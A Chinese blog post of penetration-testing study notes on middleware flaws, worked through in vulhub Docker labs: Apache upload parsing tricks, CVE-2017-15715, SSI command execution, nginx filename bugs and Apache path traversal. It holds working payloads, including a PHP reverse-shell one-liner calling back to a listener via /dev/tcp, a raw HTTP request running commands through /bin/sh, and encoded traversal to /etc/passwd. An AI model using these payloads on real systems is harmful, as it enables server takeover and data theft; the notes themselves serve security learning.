当前位置: 首页 > article >正文

PTE-中间件安全

DOCKER环境,一般是80   8080   8081端口

1  apache位置扩展名解析漏洞

cd vulhub-master/httpd/apache_parsing_vulnerability/
docker-compose up -d

修改一句话的后缀   直接上传

蚁剑

2   CVE-2017-15715 

docker-compose stop
cd ..
cd CVE-2017-15715/
docker-compose up -d

在提交的时候抓包

在文件名后加+  然后到HEX下把对应的2b改成0a, 放过去

直接访问不行,因为$匹配OA    注意这里0A要大写

能过黑名单,不能过白名单

3  SSI远程命令执行漏洞(服务器端包含)

docker-compose stop
cd ..
cd ssi-rce
docker-compose up -d

开ssi-rce

写shtml

直接上传

点击访问

需要查什么可以通过修改命令

但是再docker1中

4   nginx解析漏洞   过白名单

5  nginx文件名逻辑漏洞  过白名单

上传时抓包 文件名后加空格

正常访问不到,和视频不一样

6  可以反向shell     <?php system("bash -c 'bash -i &>/dev/tcp/192.168.100.137/10086 0>&1'");?>

上传也要加空格,同上,访问也一样

访问前开监听,访问后可以连到服务器

6  

 %2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

GET /icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

POST /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 192.168.100.131:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Mon, 11 Jun 2007 18:53:14 GMT
If-None-Match: "2d-432a5e4a73a80"
Cache-Control: max-age=0
Content-Length: 7

echo;id

GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1

<script>alert('xss')</script>


http://www.kler.cn/a/392937.html

相关文章:

  • Overleaf中设置表格中的字体为Times New Roman
  • SuperMap iDesktopX填补三维可视化地图海岸地形
  • MacOS安装Xcode(非App Store)
  • 转运机器人推动制造业智能化转型升级
  • 决策树python实现代码1
  • apt和apt-get软件包管理工具-debian
  • aws xray通过设置采样规则对请求进行过滤
  • 算法学习第二弹——STL库学习 之 vector
  • q8:docker build构建镜像 yum -y install vim报错
  • Unity图形学之Shader2.0 模板测试
  • JSqlParser、JavaCC实操
  • Unity图形学之Shader灯光的设置
  • FPGA实现串口升级及MultiBoot(五)通过约束脚本添加IPROG实例
  • 【深圳大学】数据结构A+攻略(计软版)
  • Modbus TCP 西门子PLC与 多个设备进行通讯 使用Modbus Slave模拟多个设备ID
  • 1、使用vscode+eide+stm32cubeMx开发stm32
  • 基于迭代重加权最小二乘法的算法及例程
  • AR、VR、MR、XR - 20241110
  • 简单叙述 Spring Boot 启动过程
  • java八股笔记-1-java基础
  • Vue常用加密方式
  • CRMEB Pro版v3.1源码全开源+PC端+Uniapp前端+搭建教程
  • 使用@react-three/fiber,@mkkellogg/gaussian-splats-3d加载.splat,.ply,.ksplat文件
  • MYSQL-显示触发器TRIGGER语法(十一)
  • SpringBoot(二十一)SpringBoot自定义CURL请求类
  • Optional 函数式接口